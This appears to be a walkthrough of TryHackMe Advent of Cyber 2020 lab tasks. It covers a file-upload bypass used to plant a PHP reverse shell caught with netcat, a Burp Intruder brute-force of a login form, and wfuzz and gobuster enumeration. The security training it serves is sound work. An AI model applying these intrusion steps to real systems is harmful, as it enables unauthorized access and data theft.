TryHackMe — Advent of Christmas 2-2020
Task 7 [Day 2] Web Exploitation The Elf Strikes Back!
- What string of text needs adding to the URL to get access to the upload page?
Using the id = ODIzODI5MTNiYmYw
- What type of file is accepted by the site?
Try inspecting the source code
Oh! this looks like an “I***E” file
- In which directory are the uploaded files stored?
Read through the file upload section. Pretty sure you’d find something good there
- Activate your reverse shell and catch it in a netcat listener!
You can download a php reverse shell from pentestmonkey
Change the ip to your remote machine(the ip from your vpn) or attarkbox and maybe the port in the php script.
ifconfig tun0
Firstly set up a netcat reverse listener
Now navigating to the uploads directory and clicking on the php file
Immediately we get a shell
cat /var/www/flag.txt
Task 8 [Day 3] Web Exploitation Christmas Chaos
Firing up the box and we are met with a login page
- What is the flag?
We going to go ahead to bruteforce the login page with burpsuite
Using foxyproxy to manage my burp proxy so I do not have to manually change it from my browser settings.
Turn on foxyproxy
Fire up Burpsuite
Then going to the login page and entering some random login info, using admin for username and pass for password. We basically just want to fill in the input form.
Hit Forward till you get to this
Hit cntrl-I to send to Intruder. Intruder is used to bruteforce login fields.
Postions Tab
Attack type: Cluster Bomb
username=§admin§&password=§pass§
This basically means this are the fields to be be replaced by whatever wordlist we use.
Payloads Tab
Start Attack
Don’t be mislead by the status codes, look at the Length with 255
Login with the creds
Access granted
Task 9 [Day 4] Web Exploitation Santa’s watching
Given the URL “http://shibes.xyz/api.php", what would the entire wfuzz command look like to query the “breed” parameter using the wordlist “big.txt” (assume that “big.txt” is in your current directory)
wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ
Use GoBuster (against the target you deployed — not the shibes.xyz domain) to find the API directory. What file is there?
Running the gobuster command
gobuster dir -u http://10.10.24.64 -w big.txt -x php
Lets try out the /api directory
Fuzz the date parameter on the file you found in the API directory. What is the flag displayed in the correct post?
Now that we know that site-log.php is the file inside the api directory
We can fuzz the date parameter
Look for the line with a different response from the other ones
Replace that with the FUZZ placeholder and get your flag.